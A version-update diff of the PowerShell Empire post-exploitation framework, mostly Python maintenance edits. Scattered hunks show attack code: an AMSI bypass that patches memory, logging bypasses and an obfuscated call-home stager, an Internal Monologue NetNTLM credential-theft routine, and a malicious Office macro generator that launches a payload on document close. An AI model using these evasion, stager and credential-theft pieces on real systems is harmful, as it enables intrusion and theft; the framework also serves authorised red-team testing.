Codebase list powershell-empire / upstream/3.1.4
New upstream version 3.1.4 Sophie Brun 4 years ago
21 changed file(s) with 70 addition(s) and 68 deletion(s). Raw diff Collapse all Expand all
4444 Please see our [Releases]( or [Changelog](/changelog) page for detailed release notes.
4545 ## Install
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch]( or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch]( or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
4848 __Note:__ Run ```./setup/``` before starting Empire 3.1 for the first time.
4949 ### Kali
0 3.1.3
0 3.1.4
0 4/4/2020
1 ------------
2 - Version 3.1.4 Master Release
3 - Fixed non-ascii filename download error - #141 (@tyraniter)
4 - Updated payload evasion against Defender - #147 (@Hubbl3)
5 - Added reset flag to empire launcher - #147 (@Cx01N)
6 - Replaced imp package with importlib - #108 (@Cx01N)
7 - Fixed internal monologue issue with only running once - #43 (@Cx01N)
8 - Fixed ascii encode error in powerbreach modules - #150 (@CykuTW)
010 3/22/2020
111 ------------
212 - Version 3.1.3 Master Release
313 - Fixed errors with OneDrive listener - #40 (@Cx01N)
414 - Fixed REST API get config error - #131 (@chenxiangfang)
5 - Increased timer for stale agent checkins - #130 (@C01N)
15 - Increased timer for stale agent checkins - #130 (@Cx01N)
717 3/13/2020
818 ------------
1010 import http.server
1111 import zipfile
1212 import io
13 import imp
13 import importlib.util
14 import types
1415 import re
1516 import shutil
1617 import pwd
593594 def load_module(self, fullname):
594595 submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
595596 code = compile(source, fullpath, 'exec')
596 mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
597 mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
597598 mod.__loader__ = self
598599 mod.__file__ = fullpath
599600 mod.__name__ = fullname
488488 }
489489 }
491 if (authenticatedUsers.Count > 0)
492 {
493 authenticatedUsers.Clear();
494 }
492495 //Extended NetNTLM Downgrade and impersonation can only work if the current process is elevated
493496 if (IsElevated())
494497 {
536539 //If the process is not elevated, skip downgrade and impersonation and only perform an Internal Monologue Attack for the current user
537540 if (verbose == true) Console.WriteLine("Not elevated. Performing attack with current NTLM settings on current user");
538541 Console.WriteLine(InternalMonologueForCurrentUser(challenge));
539 }
542 }
540543 }
542545 //This function performs an Internal Monologue Attack in the context of the current user and returns the NetNTLM response for the challenge 0x1122334455667788
639642 {
640643 result = ConvertHex(ByteArrayToString(user)) + "::" + ConvertHex(ByteArrayToString(domain)) + ":" + challenge + ":" + ByteArrayToString(nt_resp).Substring(0,32) + ":" + ByteArrayToString(nt_resp).Substring(32);
641644 }
643646 return result;
644647 }
700703 }
702 return ascii;
705 return ascii;
703706 }
704707 }
887890 [Console]::SetOut($OldConsoleOut)
888891 $Results = $StringWriter.ToString()
889892 $Results
890 }
893 }
14461446 generalGroup = parser.add_argument_group('General Options')
14471447 generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
1448 generalGroup.add_argument('--reset-empire', action='store_true', help="Resets Empire's database to defaults.")
14481449 generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
14491450 generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
14721473 if args.version:
14731474 print(empire.VERSION)
1476 if args.reset_empire:
14751479 elif
14761480 # start an Empire instance and RESTful API
14771481 main = empire.MainMenu(args=args)
6363 [Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
6464 $buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6)
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
6767 """
6868 bypass = bypass.replace('"kernel32"', '`"kernel32`"')
6969 bypass = bypass.replace('@"','"')
1414 from builtins import str
1515 from builtins import range
17 VERSION = "3.1.3 BC-Security Fork"
17 VERSION = "3.1.4 BC-Security Fork"
1919 from pydispatch import dispatcher
538538 def do_uselistener(self, line):
539539 "Use an Empire listener module."
540 print("uselistener")
541540 parts = line.split(' ')
543542 if parts[0] not in self.listeners.loadedListeners:
1010 from builtins import object
1111 import sys
1212 import fnmatch
13 import imp
13 import importlib.util
1414 from . import helpers
1515 import os
1616 import pickle
6464 listenerName = filePath.split("/lib/listeners/")[-1][0:-3]
6666 # instantiate the listener module and save it to the internal cache
67 self.loadedListeners[listenerName] = imp.load_source(listenerName, filePath).Listener(self.mainMenu, [])
67 spec = importlib.util.spec_from_file_location(listenerName, filePath)
68 mod = importlib.util.module_from_spec(spec)
69 spec.loader.exec_module(mod)
70 self.loadedListeners[listenerName] = mod.Listener(self.mainMenu, [])
7072 def set_listener_option(self, listenerName, option, value):
7173 """
1111 from builtins import object
1212 import fnmatch
1313 import os
14 import imp
14 import importlib.util
1515 from . import messages
1616 from . import helpers
5959 moduleName = "external/%s" %(moduleName)
6161 # instantiate the module and save it to the internal cache
62 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
62 spec = importlib.util.spec_from_file_location(moduleName, filePath)
63 mod = importlib.util.module_from_spec(spec)
64 spec.loader.exec_module(mod)
65 self.modules[moduleName] = mod.Module(self.mainMenu, [])
6567 def reload_module(self, moduleToReload):
6668 """
8385 # check to make sure we've found the specific module
8486 if moduleName.lower() == moduleToReload.lower():
8587 # instantiate the module and save it to the internal cache
86 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
88 spec = importlib.util.spec_from_file_location(moduleName, filePath)
89 mod = importlib.util.module_from_spec(spec)
90 spec.loader.exec_module(mod)
91 self.modules[moduleName] = mod.Module(self.mainMenu, [])
8993 def search_modules(self, searchTerm):
9094 """
164164 totalPacket = struct.pack('=H', 1)
165165 packetNum = struct.pack('=H', 1)
166166 resultID = struct.pack('=H', resultID)
167 length = struct.pack('=L', len(data))
167 length = struct.pack('=L', len(data.encode("UTF-8")))
168168 return taskType + totalPacket + packetNum + resultID + length + data.encode("UTF-8")
170170 def parse_result_packet(packet, offset=0):
2222 from builtins import object
2323 from past.utils import old_div
2424 import fnmatch
25 import imp
25 import importlib.util
2626 from . import helpers
2727 import errno
2828 import os
7272 stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
7474 # instantiate the module and save it to the internal cache
75 self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
75 spec = importlib.util.spec_from_file_location(stagerName, filePath)
76 mod = importlib.util.module_from_spec(spec)
77 spec.loader.exec_module(mod)
78 self.stagers[stagerName] = mod.Stager(self.mainMenu, [])
7881 def set_stager_option(self, option, value):
318318 if safeChecks.lower() == 'true':
319319 stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
320320 # ScriptBlock Logging bypass
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
329 if safeChecks.lower() == 'true':
329330 stager += "};"
330331 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
332333 stager += helpers.randomize_capitalization(
333334 "$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
334335 if userAgent.lower() == 'default':
338339 if 'https' in host:
339340 # allow for self-signed certificates for https connections
340341 stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
342 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
342343 if userAgent.lower() != 'none':
343344 stager += helpers.randomize_capitalization(
344345 "$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
397398 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
398399 meta='STAGE0', additional='None', encData='')
399400 b64RoutingPacket = base64.b64encode(routingPacket)
400 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
401402 # Add custom headers if any
402403 if customHeaders != []:
403404 for header in customHeaders:
162162 return ""
163163 else:
164164 script = script.replace("REPLACE_LAUNCHER", stagerCode)
165 script = script.encode('ascii', 'ignore')
167166 for option,values in self.options.items():
168167 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
169168 if values['Value'] and values['Value'] != '':
137137 return ""
138138 else:
139139 script = script.replace("REPLACE_LAUNCHER", stagerCode)
140 script = script.encode('ascii', 'ignore')
142141 for option,values in self.options.items():
143142 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
144143 if values['Value'] and values['Value'] != '':
149149 return ""
150150 else:
151151 script = script.replace("REPLACE_LAUNCHER", stagerCode)
152 script = script.encode('ascii', 'ignore')
154153 for option,values in self.options.items():
155154 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
19891989 return data
19911991 cipher = triple_des(key, CBC, iv)
1992 # the line below is for pycrypto instead
1993 #cipher = key, DES3.MODE_CBC, iv )
19951993 plain = cipher.decrypt(data)
169169 for chunk in chunks[1:]:
170170 payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
172 macro = "Sub Auto_Open()\n"
173 macro += "\t"+Method+"\n"
174 macro += "End Sub\n\n"
175 macro += "Sub AutoOpen()\n"
176 macro += "\t"+Method+"\n"
177 macro += "End Sub\n\n"
179 macro += "Sub Document_Open()\n"
172 macro = "Sub AutoClose()\n"
180173 macro += "\t"+Method+"\n"
181174 macro += "End Sub\n\n"
183176 macro += "Public Function "+Method+"() As Variant\n"
184 macro += "\tstrComputer = \".\"\n"
185 macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
186178 if OutlookEvasionBool == True:
187179 macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
188180 macro += "\tFor Each objItem In ID\n"
195187 macro +="\tNext\n"
197189 macro += payload
198 macro += "\tConst HIDDEN_WINDOW = 0\n"
200 macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
201 macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
202 macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
203 macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
204 macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
190 macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n"
191 macro += "\tasd.Run("+Str+")\n"
205192 macro += "End Function\n"
207194 return macro
1414 cryptography
1515 pyminifier
1616 xlutils
17 pycrypto
1817 pefile
1918 simplejson
2019 bcrypt
20 pycrypto
1414 cryptography
1515 pyminifier==2.1
1616 xlutils
17 pefile
1718 pycrypto
18 pefile
3131 then
3232 rm -rf ./downloads/
3333 fi
35 # start up Empire if not in docker otherwise return
36 if [ -f /.dockerenv ]; then
37 echo " [*] Empire reset complete returning back to Docker"
38 else
39 ./empire
40 fi